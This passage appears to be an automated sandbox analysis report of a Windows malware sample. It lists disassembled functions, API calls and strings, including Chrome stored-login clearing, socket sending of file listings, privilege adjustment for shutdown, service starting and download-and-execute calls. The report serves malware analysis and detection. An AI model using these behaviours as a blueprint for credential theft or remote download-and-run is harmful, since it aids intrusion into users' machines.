                                                  • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteErrorFileLast
                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                  • API String ID: 2018770650-1062637481
                                                  • Opcode ID: ee2bf915119a9273509f19af5871ddd12a49b98eae00241f8188c61bfa6c3715
                                                  • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                  • Opcode Fuzzy Hash: ee2bf915119a9273509f19af5871ddd12a49b98eae00241f8188c61bfa6c3715
                                                  • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                  Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                  • GetLastError.KERNEL32 ref: 00416B02
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID: SeShutdownPrivilege
                                                  • API String ID: 3534403312-3733053543
                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                  Function 00452F00 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                  • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                  • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                  • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                  Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 004089AE
                                                    • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                    • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                    • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                    • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                    • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                    • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                    • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                  • String ID:
                                                  • API String ID: 4043647387-0
                                                  • Opcode ID: 2549f590729cc7136409307f2a987a7b2c82420e2cb38837488fbdfd52369ea7
                                                  • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                  • Opcode Fuzzy Hash: 2549f590729cc7136409307f2a987a7b2c82420e2cb38837488fbdfd52369ea7
                                                  • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                  Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                  • String ID:
                                                  • API String ID: 276877138-0
                                                  • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                  • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                  • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                  • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                  Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                    • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                    • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                    • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                    • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-1420736420
                                                  • Opcode ID: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                  • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                  • Opcode Fuzzy Hash: 760194600065aa930d76b91875d7e389ee81a04dff370ffb8731a3af4adaf024
                                                  • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                  Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                  • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                  • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                  • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                  • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                  Function 0214144A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02141769,?,00000000), ref: 021414E3
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02141769,?,00000000), ref: 0214150C
                                                  • GetACP.KERNEL32(?,?,02141769,?,00000000), ref: 02141521
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                  • Instruction ID: 943e17959d37bd20d29bd9c0f3eba06b7cdea7c59b5191382517e8d5a9f20d07
                                                  • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                  • Instruction Fuzzy Hash: 69219D22A80101BAD734CF65C904BE777A7AB45A65B9A8564F90EDB210FF32DAC1C790
                                                  Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                  • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                  • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                  • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID: SETTINGS
                                                  • API String ID: 3473537107-594951305
                                                  • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                  • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                  • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                  Function 020F900E Relevance: 7.7, APIs: 5, Instructions: 216fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 020F9013
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 020F908B
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 020F90B4
                                                  • FindClose.KERNEL32(?), ref: 020F90CB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: cae9dc3e290e62eb3ac1bcabecde37f344aa65a3c2dada11a4f4a429893bb3a7
                                                  • Instruction ID: 810aec3d0c283e70a4ba5084924b81740c908c120dbc3f60b8c0f5934690f36d
                                                  • Opcode Fuzzy Hash: cae9dc3e290e62eb3ac1bcabecde37f344aa65a3c2dada11a4f4a429893bb3a7
                                                  • Instruction Fuzzy Hash: 2281443294021C9FCB95EBA0DC90EED7779BF14310F14416AEA06A7895EF346B49DF50
                                                  Function 0214161E Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 02137185
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 02137192
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0214172A
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 02141785
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 02141794
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,02133F53,00000040,?,02134073,00000055,00000000,?,?,00000055,00000000), ref: 021417DC
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,02133FD3,00000040), ref: 021417FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                  • String ID:
                                                  • API String ID: 745075371-0
                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction ID: f317a7badd921a5b53864d146b152a77ce33b69838ec1661be2429a4b648409a
                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                  • Instruction Fuzzy Hash: 33517171A40209AFDB14DFA5CC45EBA77B9AF04706F040575E91DEB190EF70D580CB61
                                                  Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00407A91
                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: 2b08fc0de606d6c1079b33fa055d885014e221de781cc0018e6c9e2278479f74
                                                  • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                  • Opcode Fuzzy Hash: 2b08fc0de606d6c1079b33fa055d885014e221de781cc0018e6c9e2278479f74
                                                  • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                  Function 020F7CF3 Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 020F7CF8
                                                  • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020F7DB1
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020F7DD5
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 020F7EDD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                  • String ID:
                                                  • API String ID: 1157919129-0
                                                  • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                  • Instruction ID: c6d75c12974abd62a87b2cd022659487adaf34d3563b45aa35baf89fc174390a
                                                  • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                  • Instruction Fuzzy Hash: D35184729803089FCF84FB64DC55AED777AAF10300F904169AE06979A1EF34AB49DF91
                                                  Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                  • _free.LIBCMT ref: 00448067
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 00448233
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                  • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                  Function 02106D1E Relevance: 7.5, APIs: 5, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 02106D2B
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02106D32
                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,0046BA18,?), ref: 02106D44
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02106D63
                                                  • GetLastError.KERNEL32 ref: 02106D69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                  • String ID:
                                                  • API String ID: 3534403312-0
                                                  • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                  • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                  • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                  Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadExecuteFileShell
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$open
                                                  • API String ID: 2825088817-4030966745
                                                  • Opcode ID: 7d739b8c9cecda73c66bc233b7c3130580c49edd6ebf268341edc09ee1dadd3d
                                                  • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                  • Opcode Fuzzy Hash: 7d739b8c9cecda73c66bc233b7c3130580c49edd6ebf268341edc09ee1dadd3d
                                                  • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                  Function 020FE7B6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0210271E: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 0210273E
                                                    • Part of subcall function 0210271E: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0210275C
                                                    • Part of subcall function 0210271E: RegCloseKey.ADVAPI32(00000000), ref: 02102767
                                                  • Sleep.KERNEL32(00000BB8), ref: 020FE86A
                                                  • ExitProcess.KERNEL32 ref: 020FE8D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: pth_unenc$BG
                                                  • API String ID: 2281282204-2233081382
                                                  • Opcode ID: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                  • Instruction ID: 3e8ae2e5e8a1e5b960415a45fc19e3549067e13863a4663288a5edc97807d885
                                                  • Opcode Fuzzy Hash: 893b02ec2893ac076e1b48ec4804a82b241512304dbf54cdddd5c3cf734e141d
                                                  • Instruction Fuzzy Hash: F0214D31FC03102FD65476788C59BAE359BAB80701F104028FD0557ADAFFA58A009BA7
                                                  Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
